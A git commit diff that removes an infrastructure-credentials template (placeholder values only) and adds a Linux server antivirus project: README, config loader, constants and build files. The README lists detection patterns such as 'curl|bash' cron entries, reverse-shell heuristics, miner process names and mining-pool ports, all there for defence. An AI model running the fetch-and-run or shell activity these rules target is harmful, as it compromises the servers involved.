remove infra.md.example, infra.md is the source of truth

This commit is contained in:
Azreen Jamal
2026-03-03 03:06:13 +08:00
parent 1ad3033cc1
commit a3c6d09350
86 changed files with 17093 additions and 39 deletions

View File

@@ -1,37 +0,0 @@
# Infrastructure Access — TEMPLATE
# Copy to .claude/infra.md and fill in real values.
# Share the real file via 1Password / Vault / `age` encrypted blob — NEVER commit it.
## Dokploy
- **Dashboard**: https://dokploy.example.com
- **API Token**: `dkp_...`
- **SSH User**: `deploy`
- **SSH Host**: `dokploy.example.com`
- **SSH Port**: `22`
- **SSH Key Path**: `~/.ssh/id_dokploy` ← or reference a 1Password SSH key
## Servers
| Name | IP / Host | SSH User | Notes |
|------------|------------------------|----------|----------------|
| prod-1 | 10.0.0.1 | deploy | primary node |
| staging-1 | 10.0.0.2 | deploy | staging node |
## Docker Registry
- **Registry**: `ghcr.io/your-org`
- **Username**: `bot`
- **Token**: `ghp_...`
## DNS / Cloudflare
- **API Token**: `cf_...`
- **Zone ID**: `...`
## Monitoring
- **Grafana URL**: https://grafana.example.com
- **API Key**: `eyJ...`
## Database
- **Prod Postgres**: `postgres://user:pass@host:5432/db`
- **Staging Postgres**: `postgres://user:pass@host:5432/db_staging`
## Other Secrets
<!-- Add anything else Claude Code needs to manage your infra -->

View File

@@ -2,8 +2,6 @@
## Infrastructure Access
**Always read `.claude/infra.md` at the start of every session** — it contains live credentials and connection details.
To set up: copy `.claude/infra.md.example` to `.claude/infra.md` and fill in real values.
**Team distribution**: share the real file via 1Password shared vault (or `age`-encrypted blob, never git).
Pi Coding Agent extension examples and experiments.

View File

@@ -0,0 +1,8 @@
AYN_MALWAREBAZAAR_API_KEY=
AYN_VIRUSTOTAL_API_KEY=
AYN_SCAN_PATH=/
AYN_QUARANTINE_PATH=/var/lib/ayn-antivirus/quarantine
AYN_DB_PATH=/var/lib/ayn-antivirus/signatures.db
AYN_LOG_PATH=/var/log/ayn-antivirus/
AYN_AUTO_QUARANTINE=false
AYN_SCAN_SCHEDULE=0 2 * * *

11
ayn-antivirus/.gitignore vendored Normal file
View File

@@ -0,0 +1,11 @@
__pycache__
*.pyc
.env
*.db
dist/
build/
*.egg-info
ayn_antivirus/signatures/yara_rules/*.yar
/quarantine_vault/
.pytest_cache
.coverage

25
ayn-antivirus/Makefile Normal file
View File

@@ -0,0 +1,25 @@
.PHONY: install dev-install test lint scan update-sigs clean
install:
pip install .
dev-install:
pip install -e ".[dev]"
test:
pytest --cov=ayn_antivirus tests/
lint:
ruff check ayn_antivirus/
black --check ayn_antivirus/
scan:
ayn-antivirus scan
update-sigs:
ayn-antivirus update
clean:
rm -rf build/ dist/ *.egg-info .pytest_cache .coverage
find . -type d -name __pycache__ -exec rm -rf {} +
find . -type f -name '*.pyc' -delete

574
ayn-antivirus/README.md Normal file
View File

@@ -0,0 +1,574 @@
<p align="center">
<pre>
██████╗ ██╗ ██╗███╗ ██╗
██╔══██╗╚██╗ ██╔╝████╗ ██║
███████║ ╚████╔╝ ██╔██╗ ██║
██╔══██║ ╚██╔╝ ██║╚██╗██║
██║ ██║ ██║ ██║ ╚████║
╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═══╝
⚔️ AYN ANTIVIRUS v1.0.0 ⚔️
Server Protection Suite
</pre>
</p>
<p align="center">
<a href="https://www.python.org/downloads/"><img src="https://img.shields.io/badge/python-3.9%2B-blue?style=for-the-badge&logo=python&logoColor=white" alt="Python 3.9+"></a>
<a href="#license"><img src="https://img.shields.io/badge/license-MIT-green?style=for-the-badge" alt="License: MIT"></a>
<a href="#"><img src="https://img.shields.io/badge/platform-linux-lightgrey?style=for-the-badge&logo=linux&logoColor=white" alt="Platform: Linux"></a>
<a href="#"><img src="https://img.shields.io/badge/version-1.0.0-orange?style=for-the-badge" alt="Version 1.0.0"></a>
</p>
---
# AYN Antivirus
**Comprehensive anti-virus, anti-malware, anti-spyware, and anti-cryptominer protection for Linux servers.**
AYN Antivirus is a purpose-built security suite designed for server environments. It combines signature-based detection, YARA rules, heuristic analysis, and live system inspection to catch threats that traditional AV tools miss — from cryptominers draining your CPU to rootkits hiding in kernel modules.
---
## Features
- 🛡️ **Real-time file system monitoring** — watches directories with inotify/FSEvents via watchdog, scans new and modified files instantly
- 🔍 **Deep file scanning with multiple detection engines** — parallel, multi-threaded scans across signature, YARA, and heuristic detectors
- 🧬 **YARA rule support** — load custom and community YARA rules for flexible pattern matching
- 📊 **Heuristic analysis** — Shannon entropy scoring, obfuscation detection, reverse-shell patterns, permission anomalies
- ⛏️ **Cryptominer detection** — process-level, network-level, and file-content analysis (stratum URLs, wallet addresses, pool domains)
- 🕵️ **Spyware & keylogger detection** — identifies keyloggers, screen/audio capture tools, data exfiltration, and shell-profile backdoors
- 🦠 **Rootkit detection** — hidden processes, hidden kernel modules, LD_PRELOAD hijacking, tampered logs, hidden network ports
- 🌐 **Auto-updating threat signatures** — pulls from abuse.ch feeds (MalwareBazaar, ThreatFox, URLhaus, Feodo Tracker) and Emerging Threats
- 🔒 **Encrypted quarantine vault** — isolates malicious files with Fernet (AES-128-CBC + HMAC-SHA256) encryption and JSON metadata
- 🔧 **Auto-remediation & patching** — kills rogue processes, fixes permissions, blocks IPs/domains, cleans cron jobs, restores system binaries
- 📝 **Reports in Text, JSON, HTML** — generate human-readable or machine-parseable reports from scan results
- ⏰ **Scheduled scanning** — built-in cron-style scheduler for unattended operation
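The entropy scoring mentioned in the heuristic bullet can be sketched as follows. This is an illustrative computation, not AYN's actual detector code; the 7.2 threshold is a commonly cited rule of thumb, not a value taken from this project:

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 (constant data) up to 8.0 (uniform random)."""
    if not data:
        return 0.0
    counts = Counter(data)
    total = len(data)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())

# Packed or encrypted payloads typically score above ~7.2 bits/byte,
# while plain text usually sits around 4-5.
print(shannon_entropy(b"A" * 1024))            # 0.0
print(shannon_entropy(bytes(range(256)) * 4))  # 8.0
```

A heuristic detector would combine a high entropy score with other signals (suspicious extension, odd permissions, obfuscation markers) rather than flag on entropy alone.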
---
## Quick Start
```bash
# Install
pip install .
# Update threat signatures
sudo ayn-antivirus update
# Run a full scan
sudo ayn-antivirus scan
# Quick scan (high-risk dirs only)
sudo ayn-antivirus scan --quick
# Check protection status
ayn-antivirus status
```
---
## Installation
### From pip (local)
```bash
pip install .
```
### Editable install (development)
```bash
pip install -e ".[dev]"
```
### From source with Make
```bash
make install # production
make dev-install # development (includes pytest, black, ruff)
```
### System dependencies
AYN uses [yara-python](https://github.com/VirusTotal/yara-python) for rule-based detection. On most systems pip handles this automatically, but you may need the YARA C library:
| Distro | Command |
|---|---|
| **Debian / Ubuntu** | `sudo apt install yara libyara-dev` |
| **RHEL / CentOS / Fedora** | `sudo dnf install yara yara-devel` |
| **Arch** | `sudo pacman -S yara` |
| **macOS (Homebrew)** | `brew install yara` |
After the system library is installed, `pip install yara-python` (or `pip install .`) will link against it.
---
## Usage
All commands accept `--verbose` / `-v` for detailed output and `--config <path>` to load a custom YAML config file.
### File System Scanning
```bash
# Full scan — all configured paths
sudo ayn-antivirus scan
# Quick scan — /tmp, /var/tmp, /dev/shm, crontabs
sudo ayn-antivirus scan --quick
# Deep scan — includes memory and hidden artifacts
sudo ayn-antivirus scan --deep
# Scan a single file
ayn-antivirus scan --file /tmp/suspicious.bin
# Targeted path with exclusions
sudo ayn-antivirus scan --path /home --exclude '*.log' --exclude '*.gz'
```
### Process Scanning
```bash
# Scan running processes for miners & suspicious CPU usage
sudo ayn-antivirus scan-processes
```
Checks every running process against known miner names (xmrig, minerd, ethminer, etc.) and flags anything above the CPU threshold (default 80%).
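The check described above can be sketched with psutil. This is a simplified illustration, not AYN's scanner; the miner-name set is a small subset of the real list:

```python
import psutil

MINER_NAMES = {"xmrig", "minerd", "ethminer"}  # subset of the known-miner list
CPU_THRESHOLD = 80.0                           # percent, the documented default

def suspicious_processes():
    """Yield (pid, name, cpu_percent) for name matches or CPU hogs."""
    for proc in psutil.process_iter(["pid", "name", "cpu_percent"]):
        try:
            name = (proc.info["name"] or "").lower()
            cpu = proc.info["cpu_percent"] or 0.0
            if name in MINER_NAMES or cpu > CPU_THRESHOLD:
                yield proc.info["pid"], name, cpu
        except (psutil.NoSuchProcess, psutil.AccessDenied):
            continue  # process exited or is protected; skip it

for pid, name, cpu in suspicious_processes():
    print(f"{pid}\t{name}\t{cpu:.1f}%")
```

Note that psutil's first `cpu_percent` sample per process is 0.0; a real scanner samples over an interval before applying the threshold.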
### Network Scanning
```bash
# Inspect active connections for mining pool traffic
sudo ayn-antivirus scan-network
```
Compares remote addresses against known mining pool domains and suspicious ports (3333, 4444, 5555, 14444, etc.).
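A port-based version of this check can be sketched with psutil (a simplified illustration; the real scanner also resolves and compares remote hosts against the pool-domain list):

```python
import psutil

SUSPICIOUS_PORTS = {3333, 4444, 5555, 14444}  # subset of the documented list

def suspicious_connections():
    """Yield (laddr, raddr, pid) for connections to known mining ports."""
    for conn in psutil.net_connections(kind="inet"):
        if conn.raddr and conn.raddr.port in SUSPICIOUS_PORTS:
            yield conn.laddr, conn.raddr, conn.pid

for laddr, raddr, pid in suspicious_connections():
    print(f"pid={pid} {laddr.ip}:{laddr.port} -> {raddr.ip}:{raddr.port}")
```

Enumerating other users' connections requires root, which matches the `sudo` in the command above.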
### Update Signatures
```bash
# Fetch latest threat intelligence from all feeds
sudo ayn-antivirus update
# Force re-download even if signatures are fresh
sudo ayn-antivirus update --force
```
### Quarantine Management
```bash
# List quarantined items
ayn-antivirus quarantine list
# View details of a quarantined item
ayn-antivirus quarantine info 1
# Restore a quarantined file to its original location
sudo ayn-antivirus quarantine restore 1
# Permanently delete a quarantined item
ayn-antivirus quarantine delete 1
```
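Under the hood, Fernet quarantine amounts to encrypting the file into the vault alongside JSON metadata, then removing the plaintext original. A minimal sketch, with hypothetical function and metadata field names (not AYN's actual vault code):

```python
import json
import os
import time
from pathlib import Path

from cryptography.fernet import Fernet

def quarantine(src: str, vault_dir: str, key: bytes) -> Path:
    """Encrypt *src* into *vault_dir* with JSON metadata, then delete the original."""
    vault = Path(vault_dir)
    vault.mkdir(parents=True, exist_ok=True)
    token = Fernet(key).encrypt(Path(src).read_bytes())
    dest = vault / (Path(src).name + ".enc")
    dest.write_bytes(token)
    dest.with_suffix(".json").write_text(json.dumps({
        "original_path": os.path.abspath(src),
        "quarantined_at": time.time(),
    }))
    os.remove(src)  # only the ciphertext remains on disk
    return dest
```

Restoring reverses the process: `Fernet(key).decrypt(dest.read_bytes())` written back to the `original_path` recorded in the metadata.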
### Real-Time Monitoring
```bash
# Watch configured paths in the foreground (Ctrl+C to stop)
sudo ayn-antivirus monitor
# Watch specific paths
sudo ayn-antivirus monitor --paths /var/www --paths /tmp
# Run as a background daemon
sudo ayn-antivirus monitor --daemon
```
### Report Generation
```bash
# Plain text report to stdout
ayn-antivirus report
# JSON report to a file
ayn-antivirus report --format json --output /tmp/report.json
# HTML report
ayn-antivirus report --format html --output report.html
```
### Auto-Fix / Remediation
```bash
# Preview all remediation actions (no changes)
sudo ayn-antivirus fix --all --dry-run
# Apply all remediations
sudo ayn-antivirus fix --all
# Fix a specific threat by ID
sudo ayn-antivirus fix --threat-id 3
```
### Status Check
```bash
# View protection status at a glance
ayn-antivirus status
```
Displays signature freshness, last scan time, quarantine count, real-time monitor state, and engine toggles.
### Configuration
```bash
# Show active configuration
ayn-antivirus config
# Set a config value (persisted to ~/.ayn-antivirus/config.yaml)
ayn-antivirus config --set auto_quarantine true
ayn-antivirus config --set scan_schedule '0 3 * * *'
```
---
## Configuration
### Config file locations
AYN loads configuration from the first file found (in order):
| Priority | Path |
|---|---|
| 1 | Explicit `--config <path>` flag |
| 2 | `/etc/ayn-antivirus/config.yaml` |
| 3 | `~/.ayn-antivirus/config.yaml` |
### Config file options
```yaml
# Directories to scan
scan_paths:
- /
exclude_paths:
- /proc
- /sys
- /dev
- /run
- /snap
# Storage
quarantine_path: /var/lib/ayn-antivirus/quarantine
db_path: /var/lib/ayn-antivirus/signatures.db
log_path: /var/log/ayn-antivirus/
# Behavior
auto_quarantine: false
scan_schedule: "0 2 * * *"
max_file_size: 104857600 # 100 MB
# Engines
enable_yara: true
enable_heuristics: true
enable_realtime_monitor: false
# API keys (optional)
api_keys:
malwarebazaar: ""
virustotal: ""
```
### Environment variables
Environment variables override config file values. Copy `.env.sample` to `.env` and populate as needed.
| Variable | Description | Default |
|---|---|---|
| `AYN_SCAN_PATH` | Comma-separated scan paths | `/` |
| `AYN_QUARANTINE_PATH` | Quarantine vault directory | `/var/lib/ayn-antivirus/quarantine` |
| `AYN_DB_PATH` | Signature database path | `/var/lib/ayn-antivirus/signatures.db` |
| `AYN_LOG_PATH` | Log directory | `/var/log/ayn-antivirus/` |
| `AYN_AUTO_QUARANTINE` | Auto-quarantine on detection (`true`/`false`) | `false` |
| `AYN_SCAN_SCHEDULE` | Cron expression for scheduled scans | `0 2 * * *` |
| `AYN_MAX_FILE_SIZE` | Max file size to scan (bytes) | `104857600` |
| `AYN_MALWAREBAZAAR_API_KEY` | MalwareBazaar API key | — |
| `AYN_VIRUSTOTAL_API_KEY` | VirusTotal API key | — |
---
## Threat Intelligence Feeds
AYN aggregates indicators from multiple open-source threat intelligence feeds:
| Feed | Source | Data Type |
|---|---|---|
| **MalwareBazaar** | [bazaar.abuse.ch](https://bazaar.abuse.ch) | Malware sample hashes (SHA-256) |
| **ThreatFox** | [threatfox.abuse.ch](https://threatfox.abuse.ch) | IOCs — IPs, domains, URLs |
| **URLhaus** | [urlhaus.abuse.ch](https://urlhaus.abuse.ch) | Malware distribution URLs |
| **Feodo Tracker** | [feodotracker.abuse.ch](https://feodotracker.abuse.ch) | Botnet C2 IP addresses |
| **Emerging Threats** | [rules.emergingthreats.net](https://rules.emergingthreats.net) | Suricata / Snort IOCs |
| **YARA Rules** | Community & custom | Pattern-matching rules (`signatures/yara_rules/`) |
Signatures are stored in a local SQLite database (`signatures.db`) with separate tables for hashes, IPs, domains, and URLs. Run `ayn-antivirus update` to pull the latest data.
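The lookup path through that database can be sketched with stdlib sqlite3. Table and column names here are illustrative, not AYN's actual schema:

```python
import hashlib
import sqlite3

# Illustrative schema: one table per indicator type, as described above.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE hashes  (sha256 TEXT PRIMARY KEY, threat_name TEXT)")
conn.execute("CREATE TABLE domains (domain TEXT PRIMARY KEY, source TEXT)")
conn.execute(
    "INSERT INTO hashes VALUES (?, ?)",
    (hashlib.sha256(b"malicious payload").hexdigest(), "Test.Sample"),
)

def lookup_hash(digest: str):
    """Return the threat name for a SHA-256 digest, or None if unknown."""
    row = conn.execute(
        "SELECT threat_name FROM hashes WHERE sha256 = ?", (digest,)
    ).fetchone()
    return row[0] if row else None

print(lookup_hash(hashlib.sha256(b"malicious payload").hexdigest()))  # Test.Sample
print(lookup_hash(hashlib.sha256(b"clean file").hexdigest()))         # None
```

Keeping indicators in indexed SQLite tables makes each per-file lookup a single primary-key query, which is what lets the scan engine check millions of hashes cheaply.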
---
## Architecture
```
┌─────────────────────────────────────────────────────────────────┐
│ CLI (cli.py) │
│ Click commands + Rich UI │
└───────────────────────────────┬─────────────────────────────────┘
┌───────────▼───────────┐
│ Core Scan Engine │
│ (core/engine.py) │
└───┬────┬────┬────┬───┘
│ │ │ │
┌─────────────┘ │ │ └─────────────┐
▼ ▼ ▼ ▼
┌─────────────────┐ ┌──────────────┐ ┌──────────────────────┐
│ Detectors │ │ Scanners │ │ Monitor │
│ ┌─────────────┐ │ │ ┌──────────┐ │ │ ┌──────────────────┐ │
│ │ Signature │ │ │ │ File │ │ │ │ Real-time │ │
│ │ YARA │ │ │ │ Process │ │ │ │ (watchdog) │ │
│ │ Heuristic │ │ │ │ Network │ │ │ └──────────────────┘ │
│ │ Cryptominer │ │ │ │ Memory │ │ └──────────────────────┘
│ │ Spyware │ │ │ └──────────┘ │
│ │ Rootkit │ │ └──────────────┘
│ └─────────────┘ │
└─────────────────┘
│ ┌──────────────────────┐
│ ┌───────────────────┐ │ Signatures │
└───►│ Event Bus │ │ ┌──────────────────┐ │
│ (core/event_bus) │ │ │ Feed Manager │ │
└──────┬────────────┘ │ │ Hash DB │ │
│ │ │ IOC DB │ │
┌──────────┼──────────┐ │ │ YARA Rules │ │
▼ ▼ ▼ │ └──────────────────┘ │
┌────────────┐ ┌────────┐ ┌───────┐ └──────────────────────┘
│ Quarantine │ │Reports │ │Remedy │
│ Vault │ │ Gen. │ │Patcher│
│ (Fernet) │ │txt/json│ │ │
│ │ │ /html │ │ │
└────────────┘ └────────┘ └───────┘
```
### Module summary
| Module | Path | Responsibility |
|---|---|---|
| **CLI** | `cli.py` | User-facing commands (Click + Rich) |
| **Config** | `config.py` | YAML & env-var configuration loader |
| **Engine** | `core/engine.py` | Orchestrates file/process/network scans |
| **Event Bus** | `core/event_bus.py` | Internal pub/sub for scan events |
| **Scheduler** | `core/scheduler.py` | Cron-based scheduled scans |
| **Detectors** | `detectors/` | Pluggable detection engines (signature, YARA, heuristic, cryptominer, spyware, rootkit) |
| **Scanners** | `scanners/` | File, process, network, and memory scanners |
| **Monitor** | `monitor/realtime.py` | Watchdog-based real-time file watcher |
| **Quarantine** | `quarantine/vault.py` | Fernet-encrypted file isolation vault |
| **Remediation** | `remediation/patcher.py` | Auto-fix engine (kill, block, clean, restore) |
| **Reports** | `reports/generator.py` | Text, JSON, and HTML report generation |
| **Signatures** | `signatures/` | Feed fetchers, hash DB, IOC DB, YARA rules |
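The event bus is what lets detectors stay decoupled from quarantine, reporting, and remediation. A minimal pub/sub sketch; the class and method names are assumptions, not AYN's actual `core/event_bus.py` API:

```python
from collections import defaultdict
from typing import Callable

class EventBus:
    """Toy pub/sub: handlers are keyed by event name and called on publish."""

    def __init__(self) -> None:
        self._handlers: dict[str, list[Callable]] = defaultdict(list)

    def subscribe(self, event: str, handler: Callable) -> None:
        self._handlers[event].append(handler)

    def publish(self, event: str, **payload) -> None:
        for handler in self._handlers[event]:
            handler(**payload)

bus = EventBus()
bus.subscribe("threat_detected", lambda path, name: print(f"ALERT: {name} in {path}"))
bus.publish("threat_detected", path="/tmp/x", name="XMRig.Miner")
```

With this shape, the quarantine vault, report generator, and remediation engine can each subscribe to `threat_detected` without the scan engine knowing any of them exist.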
---
## Auto-Patching Capabilities
The remediation engine (`ayn-antivirus fix`) can automatically apply the following fixes:
| Action | Description |
|---|---|
| **Fix permissions** | Strips SUID, SGID, and world-writable bits from compromised files |
| **Kill processes** | Sends SIGKILL to confirmed malicious processes (miners, reverse shells) |
| **Block IPs** | Adds `iptables` DROP rules for C2 and mining pool IP addresses |
| **Block domains** | Redirects malicious domains to `127.0.0.1` via `/etc/hosts` |
| **Clean cron jobs** | Removes entries matching suspicious patterns (curl\|bash, xmrig, etc.) |
| **Fix LD_PRELOAD** | Clears `/etc/ld.so.preload` entries injected by rootkits |
| **Clean SSH keys** | Removes `command=` forced-command entries from `authorized_keys` |
| **Remove startup entries** | Strips malicious lines from init scripts, systemd units, and `rc.local` |
| **Restore binaries** | Reinstalls tampered system binaries via `apt`/`dnf`/`yum` package manager |
> **Tip:** Always run with `--dry-run` first to preview changes before applying.
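The domain-blocking action, for example, reduces to appending `127.0.0.1` redirects to `/etc/hosts` for domains not already present. A dry-run-first sketch (hypothetical helper, not AYN's patcher code):

```python
def block_domains(domains, hosts_file="/etc/hosts", dry_run=True):
    """Plan (or apply) 127.0.0.1 redirects for *domains* missing from hosts_file."""
    with open(hosts_file) as fh:
        existing = fh.read()
    lines = [
        f"127.0.0.1 {d}  # blocked by ayn-antivirus"
        for d in domains
        if d not in existing
    ]
    if dry_run:
        for line in lines:
            print(f"[dry-run] would append: {line}")
        return lines
    with open(hosts_file, "a") as fh:
        fh.write("\n".join(lines) + "\n")
    return lines
```

The same plan-then-apply pattern generalizes to the other actions in the table: compute the change set first, print it under `--dry-run`, and only mutate the system on an explicit second pass.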
---
## Running as a Service
Create a systemd unit to run AYN as a persistent real-time monitor:
```ini
# /etc/systemd/system/ayn-antivirus.service
[Unit]
Description=AYN Antivirus Real-Time Monitor
After=network.target
[Service]
Type=simple
ExecStart=/usr/local/bin/ayn-antivirus monitor --daemon
ExecReload=/bin/kill -HUP $MAINPID
Restart=on-failure
RestartSec=10
User=root
Group=root
# Hardening
ProtectSystem=strict
ReadWritePaths=/var/lib/ayn-antivirus /var/log/ayn-antivirus
NoNewPrivileges=false
PrivateTmp=true
[Install]
WantedBy=multi-user.target
```
```bash
# Enable and start
sudo systemctl daemon-reload
sudo systemctl enable ayn-antivirus
sudo systemctl start ayn-antivirus
# Check status
sudo systemctl status ayn-antivirus
# View logs
sudo journalctl -u ayn-antivirus -f
```
Optionally add a timer unit for scheduled signature updates:
```ini
# /etc/systemd/system/ayn-antivirus-update.timer
[Unit]
Description=AYN Antivirus Signature Update Timer
[Timer]
OnCalendar=*-*-* 02:00:00
Persistent=true
[Install]
WantedBy=timers.target
```
```ini
# /etc/systemd/system/ayn-antivirus-update.service
[Unit]
Description=AYN Antivirus Signature Update
[Service]
Type=oneshot
ExecStart=/usr/local/bin/ayn-antivirus update
User=root
```
```bash
sudo systemctl enable --now ayn-antivirus-update.timer
```
---
## Development
### Prerequisites
- Python 3.9+
- [YARA](https://virustotal.github.io/yara/) C library (for yara-python)
### Setup
```bash
git clone <repo-url>
cd ayn-antivirus
pip install -e ".[dev]"
```
### Run tests
```bash
make test
# or directly:
pytest --cov=ayn_antivirus tests/
```
### Lint & format
```bash
make lint
# or directly:
ruff check ayn_antivirus/
black --check ayn_antivirus/
```
### Auto-format
```bash
black ayn_antivirus/
```
### Project layout
```
ayn-antivirus/
├── ayn_antivirus/
│ ├── __init__.py # Package version
│ ├── __main__.py # python -m ayn_antivirus entry point
│ ├── cli.py # Click CLI commands
│ ├── config.py # Configuration loader
│ ├── constants.py # Thresholds, paths, known indicators
│ ├── core/
│ │ ├── engine.py # Scan engine orchestrator
│ │ ├── event_bus.py # Internal event system
│ │ └── scheduler.py # Cron-based scheduler
│ ├── detectors/
│ │ ├── base.py # BaseDetector ABC + DetectionResult
│ │ ├── signature_detector.py
│ │ ├── yara_detector.py
│ │ ├── heuristic_detector.py
│ │ ├── cryptominer_detector.py
│ │ ├── spyware_detector.py
│ │ └── rootkit_detector.py
│ ├── scanners/
│ │ ├── file_scanner.py
│ │ ├── process_scanner.py
│ │ ├── network_scanner.py
│ │ └── memory_scanner.py
│ ├── monitor/
│ │ └── realtime.py # Watchdog-based file watcher
│ ├── quarantine/
│ │ └── vault.py # Fernet-encrypted quarantine
│ ├── remediation/
│ │ └── patcher.py # Auto-fix engine
│ ├── reports/
│ │ └── generator.py # Report output (text/json/html)
│ ├── signatures/
│ │ ├── manager.py # Feed orchestrator
│ │ ├── db/ # Hash DB + IOC DB (SQLite)
│ │ ├── feeds/ # Feed fetchers (abuse.ch, ET, etc.)
│ │ └── yara_rules/ # .yar rule files
│ └── utils/
│ ├── helpers.py
│ └── logger.py
├── tests/ # pytest test suite
├── pyproject.toml # Build config & dependencies
├── Makefile # Dev shortcuts
├── .env.sample # Environment variable template
└── README.md
```
### Contributing
1. Fork the repo and create a feature branch
2. Write tests for new functionality
3. Ensure `make lint` and `make test` pass
4. Submit a pull request
---
## License
This project is licensed under the **MIT License**. See [LICENSE](LICENSE) for details.
---
<p align="center">
<strong>⚔️ Stay protected. Stay vigilant. ⚔️</strong>
</p>

View File

@@ -0,0 +1 @@
__version__ = '1.0.0'

View File

@@ -0,0 +1,4 @@
from ayn_antivirus.cli import main
if __name__ == "__main__":
main()

File diff suppressed because it is too large

View File

@@ -0,0 +1,142 @@
"""Configuration loader for AYN Antivirus."""
from __future__ import annotations
import os
from dataclasses import dataclass, field
from pathlib import Path
from typing import Any, Dict, List, Optional
import yaml
from ayn_antivirus.constants import (
DEFAULT_CONFIG_PATHS,
DEFAULT_DASHBOARD_DB_PATH,
DEFAULT_DASHBOARD_HOST,
DEFAULT_DASHBOARD_PASSWORD,
DEFAULT_DASHBOARD_PORT,
DEFAULT_DASHBOARD_USERNAME,
DEFAULT_DB_PATH,
DEFAULT_LOG_PATH,
DEFAULT_QUARANTINE_PATH,
DEFAULT_SCAN_PATH,
MAX_FILE_SIZE,
)
@dataclass
class Config:
"""Application configuration, loaded from YAML config files or environment variables."""
scan_paths: List[str] = field(default_factory=lambda: [DEFAULT_SCAN_PATH])
exclude_paths: List[str] = field(
default_factory=lambda: ["/proc", "/sys", "/dev", "/run", "/snap"]
)
quarantine_path: str = DEFAULT_QUARANTINE_PATH
db_path: str = DEFAULT_DB_PATH
log_path: str = DEFAULT_LOG_PATH
auto_quarantine: bool = False
scan_schedule: str = "0 2 * * *"
api_keys: Dict[str, str] = field(default_factory=dict)
max_file_size: int = MAX_FILE_SIZE
enable_yara: bool = True
enable_heuristics: bool = True
enable_realtime_monitor: bool = False
dashboard_host: str = DEFAULT_DASHBOARD_HOST
dashboard_port: int = DEFAULT_DASHBOARD_PORT
dashboard_db_path: str = DEFAULT_DASHBOARD_DB_PATH
dashboard_username: str = DEFAULT_DASHBOARD_USERNAME
dashboard_password: str = DEFAULT_DASHBOARD_PASSWORD
@classmethod
def load(cls, config_path: Optional[str] = None) -> Config:
"""Load configuration from a YAML file, then overlay environment variables.
Search order:
1. Explicit ``config_path`` argument.
2. /etc/ayn-antivirus/config.yaml
3. ~/.ayn-antivirus/config.yaml
4. Environment variables (always applied last as overrides).
"""
data: Dict[str, Any] = {}
paths_to_try = [config_path] if config_path else DEFAULT_CONFIG_PATHS
for path in paths_to_try:
if path and Path(path).is_file():
with open(path, "r") as fh:
data = yaml.safe_load(fh) or {}
break
defaults = cls()
config = cls(
scan_paths=data.get("scan_paths", defaults.scan_paths),
exclude_paths=data.get("exclude_paths", defaults.exclude_paths),
quarantine_path=data.get("quarantine_path", DEFAULT_QUARANTINE_PATH),
db_path=data.get("db_path", DEFAULT_DB_PATH),
log_path=data.get("log_path", DEFAULT_LOG_PATH),
auto_quarantine=data.get("auto_quarantine", False),
scan_schedule=data.get("scan_schedule", "0 2 * * *"),
api_keys=data.get("api_keys", {}),
max_file_size=data.get("max_file_size", MAX_FILE_SIZE),
enable_yara=data.get("enable_yara", True),
enable_heuristics=data.get("enable_heuristics", True),
enable_realtime_monitor=data.get("enable_realtime_monitor", False),
dashboard_host=data.get("dashboard_host", DEFAULT_DASHBOARD_HOST),
dashboard_port=data.get("dashboard_port", DEFAULT_DASHBOARD_PORT),
dashboard_db_path=data.get("dashboard_db_path", DEFAULT_DASHBOARD_DB_PATH),
dashboard_username=data.get("dashboard_username", DEFAULT_DASHBOARD_USERNAME),
dashboard_password=data.get("dashboard_password", DEFAULT_DASHBOARD_PASSWORD),
)
# --- Environment variable overrides ---
config._apply_env_overrides()
return config
def _apply_env_overrides(self) -> None:
"""Override config fields with AYN_* environment variables when set."""
if os.getenv("AYN_SCAN_PATH"):
self.scan_paths = [p.strip() for p in os.environ["AYN_SCAN_PATH"].split(",")]
if os.getenv("AYN_QUARANTINE_PATH"):
self.quarantine_path = os.environ["AYN_QUARANTINE_PATH"]
if os.getenv("AYN_DB_PATH"):
self.db_path = os.environ["AYN_DB_PATH"]
if os.getenv("AYN_LOG_PATH"):
self.log_path = os.environ["AYN_LOG_PATH"]
if os.getenv("AYN_AUTO_QUARANTINE"):
self.auto_quarantine = os.environ["AYN_AUTO_QUARANTINE"].lower() in (
"true",
"1",
"yes",
)
if os.getenv("AYN_SCAN_SCHEDULE"):
self.scan_schedule = os.environ["AYN_SCAN_SCHEDULE"]
if os.getenv("AYN_MALWAREBAZAAR_API_KEY"):
self.api_keys["malwarebazaar"] = os.environ["AYN_MALWAREBAZAAR_API_KEY"]
if os.getenv("AYN_VIRUSTOTAL_API_KEY"):
self.api_keys["virustotal"] = os.environ["AYN_VIRUSTOTAL_API_KEY"]
if os.getenv("AYN_MAX_FILE_SIZE"):
self.max_file_size = int(os.environ["AYN_MAX_FILE_SIZE"])
if os.getenv("AYN_DASHBOARD_HOST"):
self.dashboard_host = os.environ["AYN_DASHBOARD_HOST"]
if os.getenv("AYN_DASHBOARD_PORT"):
self.dashboard_port = int(os.environ["AYN_DASHBOARD_PORT"])
if os.getenv("AYN_DASHBOARD_DB_PATH"):
self.dashboard_db_path = os.environ["AYN_DASHBOARD_DB_PATH"]
if os.getenv("AYN_DASHBOARD_USERNAME"):
self.dashboard_username = os.environ["AYN_DASHBOARD_USERNAME"]
if os.getenv("AYN_DASHBOARD_PASSWORD"):
self.dashboard_password = os.environ["AYN_DASHBOARD_PASSWORD"]

View File

@@ -0,0 +1,161 @@
"""Constants for AYN Antivirus."""
import os
# --- Default Paths ---
DEFAULT_CONFIG_PATHS = [
"/etc/ayn-antivirus/config.yaml",
os.path.expanduser("~/.ayn-antivirus/config.yaml"),
]
DEFAULT_SCAN_PATH = "/"
DEFAULT_QUARANTINE_PATH = "/var/lib/ayn-antivirus/quarantine"
DEFAULT_DB_PATH = "/var/lib/ayn-antivirus/signatures.db"
DEFAULT_LOG_PATH = "/var/log/ayn-antivirus/"
DEFAULT_YARA_RULES_DIR = os.path.join(os.path.dirname(__file__), "signatures", "yara_rules")
QUARANTINE_ENCRYPTION_KEY_FILE = "/var/lib/ayn-antivirus/.quarantine.key"
# --- Database ---
DB_SCHEMA_VERSION = 1
# --- Scan Limits ---
SCAN_CHUNK_SIZE = 65536 # 64 KB
MAX_FILE_SIZE = 100 * 1024 * 1024 # 100 MB
HIGH_CPU_THRESHOLD = 80 # percent
# --- Suspicious File Extensions ---
SUSPICIOUS_EXTENSIONS = [
".php",
".sh",
".py",
".pl",
